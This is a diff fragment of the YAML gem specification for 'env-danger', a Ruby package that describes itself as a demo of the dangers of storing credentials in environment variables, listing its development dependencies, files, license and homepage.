|
+
version: 3.2.0.pre
|
104
|
+
type: :development
|
105
|
+
prerelease: false
|
106
|
+
version_requirements: !ruby/object:Gem::Requirement
|
107
|
+
requirements:
|
108
|
+
- - "~>"
|
109
|
+
- !ruby/object:Gem::Version
|
110
|
+
version: 3.2.0.pre
|
111
|
+
- !ruby/object:Gem::Dependency
|
112
|
+
name: rspec-support
|
113
|
+
requirement: !ruby/object:Gem::Requirement
|
114
|
+
requirements:
|
115
|
+
- - "~>"
|
116
|
+
- !ruby/object:Gem::Version
|
117
|
+
version: 3.2.0.pre
|
118
|
+
type: :development
|
119
|
+
prerelease: false
|
120
|
+
version_requirements: !ruby/object:Gem::Requirement
|
121
|
+
requirements:
|
122
|
+
- - "~>"
|
123
|
+
- !ruby/object:Gem::Version
|
124
|
+
version: 3.2.0.pre
|
125
|
+
- !ruby/object:Gem::Dependency
|
126
|
+
name: rspec-mocks
|
127
|
+
requirement: !ruby/object:Gem::Requirement
|
128
|
+
requirements:
|
129
|
+
- - "~>"
|
130
|
+
- !ruby/object:Gem::Version
|
131
|
+
version: 3.2.0.pre
|
132
|
+
type: :development
|
133
|
+
prerelease: false
|
134
|
+
version_requirements: !ruby/object:Gem::Requirement
|
135
|
+
requirements:
|
136
|
+
- - "~>"
|
137
|
+
- !ruby/object:Gem::Version
|
138
|
+
version: 3.2.0.pre
|
139
|
+
- !ruby/object:Gem::Dependency
|
140
|
+
name: rspec
|
141
|
+
requirement: !ruby/object:Gem::Requirement
|
142
|
+
requirements:
|
143
|
+
- - "~>"
|
144
|
+
- !ruby/object:Gem::Version
|
145
|
+
version: 3.2.0.pre
|
146
|
+
type: :development
|
147
|
+
prerelease: false
|
148
|
+
version_requirements: !ruby/object:Gem::Requirement
|
149
|
+
requirements:
|
150
|
+
- - "~>"
|
151
|
+
- !ruby/object:Gem::Version
|
152
|
+
version: 3.2.0.pre
|
153
|
+
- !ruby/object:Gem::Dependency
|
154
|
+
name: simplecov
|
155
|
+
requirement: !ruby/object:Gem::Requirement
|
156
|
+
requirements:
|
157
|
+
- - ">="
|
158
|
+
- !ruby/object:Gem::Version
|
159
|
+
version: '0'
|
160
|
+
type: :development
|
161
|
+
prerelease: false
|
162
|
+
version_requirements: !ruby/object:Gem::Requirement
|
163
|
+
requirements:
|
164
|
+
- - ">="
|
165
|
+
- !ruby/object:Gem::Version
|
166
|
+
version: '0'
|
167
|
+
- !ruby/object:Gem::Dependency
|
168
|
+
name: coveralls
|
169
|
+
requirement: !ruby/object:Gem::Requirement
|
170
|
+
requirements:
|
171
|
+
- - ">="
|
172
|
+
- !ruby/object:Gem::Version
|
173
|
+
version: '0'
|
174
|
+
type: :development
|
175
|
+
prerelease: false
|
176
|
+
version_requirements: !ruby/object:Gem::Requirement
|
177
|
+
requirements:
|
178
|
+
- - ">="
|
179
|
+
- !ruby/object:Gem::Version
|
180
|
+
version: '0'
|
181
|
+
- !ruby/object:Gem::Dependency
|
182
|
+
name: webmock
|
183
|
+
requirement: !ruby/object:Gem::Requirement
|
184
|
+
requirements:
|
185
|
+
- - ">="
|
186
|
+
- !ruby/object:Gem::Version
|
187
|
+
version: '0'
|
188
|
+
type: :development
|
189
|
+
prerelease: false
|
190
|
+
version_requirements: !ruby/object:Gem::Requirement
|
191
|
+
requirements:
|
192
|
+
- - ">="
|
193
|
+
- !ruby/object:Gem::Version
|
194
|
+
version: '0'
|
195
|
+
description: |-
|
196
|
+
Demonstrates the dangers of using
|
197
|
+
ENV to store credentials
|
198
|
+
email: tibbon@gmail.com
|
199
|
+
executables: []
|
200
|
+
extensions: []
|
201
|
+
extra_rdoc_files:
|
202
|
+
- LICENSE.txt
|
203
|
+
- README.md
|
204
|
+
files:
|
205
|
+
- ".document"
|
206
|
+
- ".rspec"
|
207
|
+
- Gemfile
|
208
|
+
- Gemfile.lock
|
209
|
+
- LICENSE.txt
|
210
|
+
- README.md
|
211
|
+
- Rakefile
|
212
|
+
- VERSION
|
213
|
+
- env-danger.gemspec
|
214
|
+
- lib/env-danger.rb
|
215
|
+
- lib/env-danger/danger.rb
|
216
|
+
- lib/env-danger/version.rb
|
217
|
+
- spec/danger_spec.rb
|
218
|
+
- spec/fixtures/env_example.json
|
219
|
+
- spec/spec_helper.rb
|
220
|
+
homepage: http://github.com/tibbon/env-danger
|
221
|
+
licenses:
|
222
|
+
- MIT
|
223
|
+
metadata: {}
|
224
|
+
post_install_message:
|
225
|
+
rdoc_options: []
|
226
|
+
require_paths:
|
227
|
+
- lib
|
228
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
229
|
+
requirements:
|
230
|
+
- - ">="
|
231
|
+
- !ruby/object:Gem::Version
|
232
|
+
version: '0'
|
233
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
234
|
+
requirements:
|
235
|
+
- - ">="
|
236
|
+
- !ruby/object:Gem::Version
|
237
|
+
version: '0'
|
238
|
+
requirements: []
|
239
|
+
rubyforge_project:
|
240
|
+
rubygems_version: 2.2.2
|
241
|
+
signing_key:
|
242
|
+
specification_version: 4
|
243
|
+
summary: Do not install, a security-hole demo only
|
244
|
+
test_files: []
|